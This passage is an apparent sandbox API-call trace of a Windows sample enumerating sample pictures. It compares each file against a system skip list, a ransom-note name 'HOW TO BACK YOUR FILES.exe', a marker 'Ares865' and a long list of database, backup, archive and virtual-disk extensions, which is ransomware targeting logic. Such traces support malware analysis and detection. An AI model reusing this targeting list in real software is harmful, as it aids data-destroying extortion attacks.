[0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".") returned 1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="..") returned 1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="windows") returned -1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="bootmgr") returned 1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="temp") returned -1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="pagefile.sys") returned -1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="boot") returned 1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="ids.txt") returned -1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="ntuser.dat") returned -1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="perflogs") returned -1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="MSBuild") returned -1 [0039.873] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0039.873] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned 42 [0039.873] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="Chrysanthemum.jpg" | out: lpString1="Chrysanthemum.jpg") returned="Chrysanthemum.jpg" [0039.873] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0039.873] lstrlenW (lpString="Ares865") returned 7 [0039.873] lstrcmpiW (lpString1="mum.jpg", lpString2="Ares865") returned 1 [0039.873] lstrlenW (lpString=".dll") returned 4 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".dll") returned 1 [0039.873] lstrlenW (lpString=".lnk") returned 4 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".lnk") returned 1 [0039.873] lstrlenW (lpString=".ini") returned 4 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".ini") returned 1 [0039.873] lstrlenW (lpString=".sys") returned 4 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".sys") returned 1 [0039.873] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0039.873] lstrlenW (lpString="bak") returned 3 [0039.873] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0039.873] lstrlenW (lpString="ba_") returned 3 [0039.873] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0039.873] lstrlenW (lpString="dbb") returned 3 [0039.873] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0039.874] lstrlenW (lpString="vmdk") returned 4 [0039.874] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0039.874] lstrlenW (lpString="rar") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0039.874] lstrlenW (lpString="zip") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0039.874] lstrlenW (lpString="tgz") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0039.874] lstrlenW (lpString="vbox") returned 4 [0039.874] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0039.874] lstrlenW (lpString="vdi") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0039.874] lstrlenW (lpString="vhd") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0039.874] lstrlenW (lpString="vhdx") returned 4 [0039.874] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0039.874] lstrlenW (lpString="avhd") returned 4 [0039.874] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0039.874] lstrlenW (lpString="db") returned 2 [0039.874] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0039.874] lstrlenW (lpString="db2") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0039.874] lstrlenW (lpString="db3") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0039.874] lstrlenW (lpString="dbf") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0039.874] lstrlenW (lpString="mdf") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0039.874] lstrlenW (lpString="mdb") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0039.874] lstrlenW (lpString="sql") returned 3 [0039.874] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0039.874] lstrlenW (lpString="sqlite") returned 6 [0039.874] lstrcmpiW (lpString1="um.jpg", lpString2="sqlite") returned 1 [0039.875] lstrlenW (lpString="sqlite3") returned 7 [0039.875] lstrcmpiW (lpString1="mum.jpg", lpString2="sqlite3") returned -1 [0039.875] lstrlenW (lpString="sqlitedb") returned 8 [0039.875] lstrcmpiW (lpString1="emum.jpg", lpString2="sqlitedb") returned -1 [0039.875] lstrlenW (lpString="xml") returned 3 [0039.875] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0039.875] lstrlenW (lpString="$er") returned 3 [0039.875] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0039.875] lstrlenW (lpString="4dd") returned 3 [0039.875] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0039.875] lstrlenW (lpString="4dl") returned 3 [0039.875] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0039.875] lstrlenW (lpString="^^^") returned 3 [0039.875] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0039.875] lstrlenW (lpString="abs") returned 3 [0039.875] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0039.875] lstrlenW (lpString="abx") returned 3 [0039.875] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0039.875] lstrlenW (lpString="accdb") returned 5 [0039.875] lstrcmpiW (lpString1="m.jpg", lpString2="accdb") returned 1 [0039.875] lstrlenW (lpString="accdc") returned 5 [0039.875] lstrcmpiW (lpString1="m.jpg", lpString2="accdc") returned 1 [0039.875] lstrlenW (lpString="accde") returned 5 [0039.875] lstrcmpiW (lpString1="m.jpg", lpString2="accde") returned 1 [0039.875] lstrlenW (lpString="accdr") returned 5 [0039.875] lstrcmpiW (lpString1="m.jpg", lpString2="accdr") returned 1 [0039.875] lstrlenW (lpString="accdt") returned 5 [0039.875] lstrcmpiW (lpString1="m.jpg", lpString2="accdt") returned 1 [0039.875] lstrlenW (lpString="accdw") returned 5 [0039.875] lstrcmpiW (lpString1="m.jpg", lpString2="accdw") returned 1 [0039.875] lstrlenW (lpString="accft") returned 5 [0039.875] lstrcmpiW (lpString1="m.jpg", lpString2="accft") returned 1 [0039.875] lstrlenW (lpString="adb") returned 3 [0039.875] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0039.876] lstrlenW (lpString="adb") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0039.876] lstrlenW (lpString="ade") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0039.876] lstrlenW (lpString="adf") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0039.876] lstrlenW (lpString="adn") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0039.876] lstrlenW (lpString="adp") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0039.876] lstrlenW (lpString="alf") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0039.876] lstrlenW (lpString="ask") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0039.876] lstrlenW (lpString="btr") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0039.876] lstrlenW (lpString="cat") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0039.876] lstrlenW (lpString="cdb") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0039.876] lstrlenW (lpString="ckp") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0039.876] lstrlenW (lpString="cma") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0039.876] lstrlenW (lpString="cpd") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0039.876] lstrlenW (lpString="dacpac") returned 6 [0039.876] lstrcmpiW (lpString1="um.jpg", lpString2="dacpac") returned 1 [0039.876] lstrlenW (lpString="dad") returned 3 [0039.876] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0039.876] lstrlenW (lpString="dadiagrams") returned 10 [0039.876] lstrcmpiW (lpString1="themum.jpg", lpString2="dadiagrams") returned 1 [0039.876] lstrlenW (lpString="daschema") returned 8 [0039.876] lstrcmpiW (lpString1="emum.jpg", lpString2="daschema") returned 1 [0039.876] lstrlenW (lpString="db-journal") returned 10 [0039.876] lstrcmpiW (lpString1="themum.jpg", lpString2="db-journal") returned 1 [0039.877] lstrlenW (lpString="db-shm") returned 6 [0039.877] lstrcmpiW (lpString1="um.jpg", lpString2="db-shm") returned 1 [0039.877] lstrlenW (lpString="db-wal") returned 6 [0039.877] lstrcmpiW (lpString1="um.jpg", lpString2="db-wal") returned 1 [0039.877] lstrlenW (lpString="dbc") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0039.877] lstrlenW (lpString="dbs") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0039.877] lstrlenW (lpString="dbt") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0039.877] lstrlenW (lpString="dbv") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0039.877] lstrlenW (lpString="dbx") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0039.877] lstrlenW (lpString="dcb") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0039.877] lstrlenW (lpString="dct") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0039.877] lstrlenW (lpString="dcx") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0039.877] lstrlenW (lpString="ddl") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0039.877] lstrlenW (lpString="dlis") returned 4 [0039.877] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0039.877] lstrlenW (lpString="dp1") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0039.877] lstrlenW (lpString="dqy") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0039.877] lstrlenW (lpString="dsk") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0039.877] lstrlenW (lpString="dsn") returned 3 [0039.877] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0039.877] lstrlenW (lpString="dtsx") returned 4 [0039.877] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0039.877] lstrlenW (lpString="dxl") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0039.878] lstrlenW (lpString="eco") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0039.878] lstrlenW (lpString="ecx") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0039.878] lstrlenW (lpString="edb") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0039.878] lstrlenW (lpString="epim") returned 4 [0039.878] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0039.878] lstrlenW (lpString="fcd") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0039.878] lstrlenW (lpString="fdb") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0039.878] lstrlenW (lpString="fic") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0039.878] lstrlenW (lpString="flexolibrary") returned 12 [0039.878] lstrcmpiW (lpString1="anthemum.jpg", lpString2="flexolibrary") returned -1 [0039.878] lstrlenW (lpString="fm5") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0039.878] lstrlenW (lpString="fmp") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0039.878] lstrlenW (lpString="fmp12") returned 5 [0039.878] lstrcmpiW (lpString1="m.jpg", lpString2="fmp12") returned 1 [0039.878] lstrlenW (lpString="fmpsl") returned 5 [0039.878] lstrcmpiW (lpString1="m.jpg", lpString2="fmpsl") returned 1 [0039.878] lstrlenW (lpString="fol") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0039.878] lstrlenW (lpString="fp3") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0039.878] lstrlenW (lpString="fp4") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0039.878] lstrlenW (lpString="fp5") returned 3 [0039.878] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0039.878] lstrlenW (lpString="fp7") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0039.879] lstrlenW (lpString="fpt") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0039.879] lstrlenW (lpString="frm") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0039.879] lstrlenW (lpString="gdb") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0039.879] lstrlenW (lpString="gdb") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0039.879] lstrlenW (lpString="grdb") returned 4 [0039.879] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0039.879] lstrlenW (lpString="gwi") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0039.879] lstrlenW (lpString="hdb") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0039.879] lstrlenW (lpString="his") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0039.879] lstrlenW (lpString="ib") returned 2 [0039.879] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0039.879] lstrlenW (lpString="idb") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0039.879] lstrlenW (lpString="ihx") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0039.879] lstrlenW (lpString="itdb") returned 4 [0039.879] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0039.879] lstrlenW (lpString="itw") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0039.879] lstrlenW (lpString="jet") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0039.879] lstrlenW (lpString="jtx") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0039.879] lstrlenW (lpString="kdb") returned 3 [0039.879] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0039.879] lstrlenW (lpString="kexi") returned 4 [0039.880] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0039.880] lstrlenW (lpString="kexic") returned 5 [0039.880] lstrcmpiW (lpString1="m.jpg", lpString2="kexic") returned 1 [0039.880] lstrlenW (lpString="kexis") returned 5 [0039.880] lstrcmpiW (lpString1="m.jpg", lpString2="kexis") returned 1 [0039.880] lstrlenW (lpString="lgc") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0039.880] lstrlenW (lpString="lwx") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0039.880] lstrlenW (lpString="maf") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0039.880] lstrlenW (lpString="maq") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0039.880] lstrlenW (lpString="mar") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0039.880] lstrlenW (lpString="marshal") returned 7 [0039.880] lstrcmpiW (lpString1="mum.jpg", lpString2="marshal") returned 1 [0039.880] lstrlenW (lpString="mas") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0039.880] lstrlenW (lpString="mav") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0039.880] lstrlenW (lpString="maw") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0039.880] lstrlenW (lpString="mdbhtml") returned 7 [0039.880] lstrcmpiW (lpString1="mum.jpg", lpString2="mdbhtml") returned 1 [0039.880] lstrlenW (lpString="mdn") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0039.880] lstrlenW (lpString="mdt") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0039.880] lstrlenW (lpString="mfd") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0039.880] lstrlenW (lpString="mpd") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0039.880] lstrlenW (lpString="mrg") returned 3 [0039.880] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0039.881] lstrlenW (lpString="mud") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0039.881] lstrlenW (lpString="mwb") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0039.881] lstrlenW (lpString="myd") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0039.881] lstrlenW (lpString="ndf") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0039.881] lstrlenW (lpString="nnt") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0039.881] lstrlenW (lpString="nrmlib") returned 6 [0039.881] lstrcmpiW (lpString1="um.jpg", lpString2="nrmlib") returned 1 [0039.881] lstrlenW (lpString="ns2") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0039.881] lstrlenW (lpString="ns3") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0039.881] lstrlenW (lpString="ns4") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0039.881] lstrlenW (lpString="nsf") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0039.881] lstrlenW (lpString="nv") returned 2 [0039.881] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0039.881] lstrlenW (lpString="nv2") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0039.881] lstrlenW (lpString="nwdb") returned 4 [0039.881] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0039.881] lstrlenW (lpString="nyf") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0039.881] lstrlenW (lpString="odb") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0039.881] lstrlenW (lpString="odb") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0039.881] lstrlenW (lpString="oqy") returned 3 [0039.881] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0039.882] lstrlenW (lpString="ora") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0039.882] lstrlenW (lpString="orx") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0039.882] lstrlenW (lpString="owc") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0039.882] lstrlenW (lpString="p96") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0039.882] lstrlenW (lpString="p97") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0039.882] lstrlenW (lpString="pan") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0039.882] lstrlenW (lpString="pdb") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0039.882] lstrlenW (lpString="pdm") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0039.882] lstrlenW (lpString="pnz") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0039.882] lstrlenW (lpString="qry") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0039.882] lstrlenW (lpString="qvd") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0039.882] lstrlenW (lpString="rbf") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0039.882] lstrlenW (lpString="rctd") returned 4 [0039.882] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0039.882] lstrlenW (lpString="rod") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0039.882] lstrlenW (lpString="rodx") returned 4 [0039.882] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0039.882] lstrlenW (lpString="rpd") returned 3 [0039.882] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0039.882] lstrlenW (lpString="rsd") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0039.883] lstrlenW (lpString="sas7bdat") returned 8 [0039.883] lstrcmpiW (lpString1="emum.jpg", lpString2="sas7bdat") returned -1 [0039.883] lstrlenW (lpString="sbf") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0039.883] lstrlenW (lpString="scx") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0039.883] lstrlenW (lpString="sdb") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0039.883] lstrlenW (lpString="sdc") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0039.883] lstrlenW (lpString="sdf") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0039.883] lstrlenW (lpString="sis") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0039.883] lstrlenW (lpString="spq") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0039.883] lstrlenW (lpString="te") returned 2 [0039.883] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0039.883] lstrlenW (lpString="teacher") returned 7 [0039.883] lstrcmpiW (lpString1="mum.jpg", lpString2="teacher") returned -1 [0039.883] lstrlenW (lpString="tmd") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0039.883] lstrlenW (lpString="tps") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0039.883] lstrlenW (lpString="trc") returned 3 [0039.883] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0039.884] lstrlenW (lpString="trc") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0039.884] lstrlenW (lpString="trm") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0039.884] lstrlenW (lpString="udb") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0039.884] lstrlenW (lpString="udl") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0039.884] lstrlenW (lpString="usr") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0039.884] lstrlenW (lpString="v12") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0039.884] lstrlenW (lpString="vis") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0039.884] lstrlenW (lpString="vpd") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0039.884] lstrlenW (lpString="vvv") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0039.884] lstrlenW (lpString="wdb") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0039.884] lstrlenW (lpString="wmdb") returned 4 [0039.884] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0039.884] lstrlenW (lpString="wrk") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0039.884] lstrlenW (lpString="xdb") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0039.884] lstrlenW (lpString="xld") returned 3 [0039.884] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0039.884] lstrlenW (lpString="xmlff") returned 5 [0039.884] lstrcmpiW (lpString1="m.jpg", lpString2="xmlff") returned -1 [0039.884] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0039.884] lstrcmpiW (lpString1="Desert.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.884] lstrcmpiW (lpString1="Desert.jpg", lpString2="aoldtz.exe") returned 1 [0039.884] lstrcmpiW (lpString1="Desert.jpg", lpString2=".") returned 1 [0039.884] lstrcmpiW (lpString1="Desert.jpg", lpString2="..") returned 1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="windows") returned -1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="bootmgr") returned 1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="temp") returned -1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="pagefile.sys") returned -1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="boot") returned 1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="ids.txt") returned -1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="ntuser.dat") returned -1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="perflogs") returned -1 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2="MSBuild") returned -1 [0039.885] lstrlenW (lpString="Desert.jpg") returned 10 [0039.885] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 58 [0039.885] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="Desert.jpg" | out: lpString1="Desert.jpg") returned="Desert.jpg" [0039.885] lstrlenW (lpString="Desert.jpg") returned 10 [0039.885] lstrlenW (lpString="Ares865") returned 7 [0039.885] lstrcmpiW (lpString1="ert.jpg", lpString2="Ares865") returned 1 [0039.885] lstrlenW (lpString=".dll") returned 4 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2=".dll") returned 1 [0039.885] lstrlenW (lpString=".lnk") returned 4 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2=".lnk") returned 1 [0039.885] lstrlenW (lpString=".ini") returned 4 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2=".ini") returned 1 [0039.885] lstrlenW (lpString=".sys") returned 4 [0039.885] lstrcmpiW (lpString1="Desert.jpg", lpString2=".sys") returned 1 [0039.885] lstrlenW (lpString="Desert.jpg") returned 10 [0039.885] lstrlenW (lpString="bak") returned 3 [0039.885] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0039.885] lstrlenW (lpString="ba_") returned 3 [0039.885] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0039.885] lstrlenW (lpString="dbb") returned 3 [0039.885] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0039.885] lstrlenW (lpString="vmdk") returned 4 [0039.885] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0039.885] lstrlenW (lpString="rar") returned 3 [0039.885] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0039.886] lstrlenW (lpString="zip") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0039.886] lstrlenW (lpString="tgz") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0039.886] lstrlenW (lpString="vbox") returned 4 [0039.886] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned 